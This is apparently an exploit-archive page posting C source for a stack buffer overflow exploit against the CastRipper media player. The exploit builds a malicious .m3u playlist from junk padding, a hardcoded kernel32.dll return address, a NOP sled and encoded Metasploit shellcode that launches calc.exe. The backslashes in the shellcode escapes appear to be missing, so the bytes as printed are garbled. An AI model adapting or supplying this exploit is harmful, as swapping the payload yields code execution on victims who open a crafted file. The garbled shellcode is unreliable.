CastRipper (.M3U) Stack BOF WinXP SP2

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CastRipper (.M3U) Stack BOF WinXP SP2
# Published : 2009-12-24
# Author : bibi-info
# Previous Title : Exploit Easy RM to MP3 2.7.3.700 - Ruby
# Next Title : 2.6.18-20 2009 Local Root Exploit
//Exploit Title: CastRipper (.M3U) Stack BOF WinXP SP2 - C
// Date: 25/12/2009
// Author: bibi-info
// Version: 2.50.70
// Tested on: Windows Xp sp2
// greetz : His0k4 & All friends & muslims HaCkers(dz)



#include<stdio.h>
#include<string.h>
#include<stdlib.h>



/* win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com */
unsigned char scode[] =
                         "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
                         "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
                         "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
                         "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
                         "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
                         "x42x50x42x30x42x30x4bx38x45x34x4ex33x4bx58x4ex47"
                         "x45x30x4ax47x41x30x4fx4ex4bx58x4fx54x4ax41x4bx48"
                         "x4fx35x42x42x41x50x4bx4ex49x54x4bx48x46x43x4bx58"
                         "x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c"
                         "x46x47x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e"
                         "x46x4fx4bx53x46x55x46x42x46x50x45x47x45x4ex4bx58"
                         "x4fx35x46x32x41x50x4bx4ex48x46x4bx38x4ex30x4bx54"
                         "x4bx38x4fx45x4ex41x41x50x4bx4ex4bx38x4ex41x4bx38"
                         "x41x30x4bx4ex49x48x4ex35x46x52x46x30x43x4cx41x33"
                         "x42x4cx46x36x4bx48x42x34x42x43x45x38x42x4cx4ax37"
                         "x4ex50x4bx58x42x44x4ex50x4bx38x42x57x4ex41x4dx4a"
                         "x4bx58x4ax46x4ax30x4bx4ex49x30x4bx48x42x38x42x4b"
                         "x42x50x42x50x42x30x4bx58x4ax46x4ex43x4fx45x41x33"
                         "x48x4fx42x56x48x45x49x58x4ax4fx43x38x42x4cx4bx37"
                         "x42x35x4ax46x50x57x4ax4dx44x4ex43x47x4ax46x4ax39"
                         "x50x4fx4cx48x50x50x47x35x4fx4fx47x4ex43x36x41x36"
                         "x4ex36x43x46x42x50x5a";





int main ( int argc , char * argv[])

{

    FILE* fexp= NULL;
    char* EIP = "x0CxADx81x7C"; // 0x7C81AD0C  kernel32.dll
    int i;


    printf("t. .. ... CastRipper m3u Stack buffer Overflow Exploit ... .. .rn");
    printf("t          -------> execute calc.exe <-------n");


    if( (fexp=fopen("test.m3u","wb")) ==NULL )
    {
         perror("cannot open exploit  file!!!");
         exit(0);
    }

                for (i=0; i<26081; i++)
                {
                    fwrite("x41", 1, 1, fexp);  // Junk
                }

                fwrite(EIP, 4, 1, fexp);  // ret

                for (i=0; i<50; i++)
                {
                    fwrite("x90", 1, 1, fexp);// Nop's
                }

                fwrite(scode, sizeof(scode), 1, fexp);

                fclose(fexp);

                printf("[+] test.m3u Created successfully rn");
                printf("[+] Exploited By b!b!-!nfo from Algeria rn");


    return 0;

}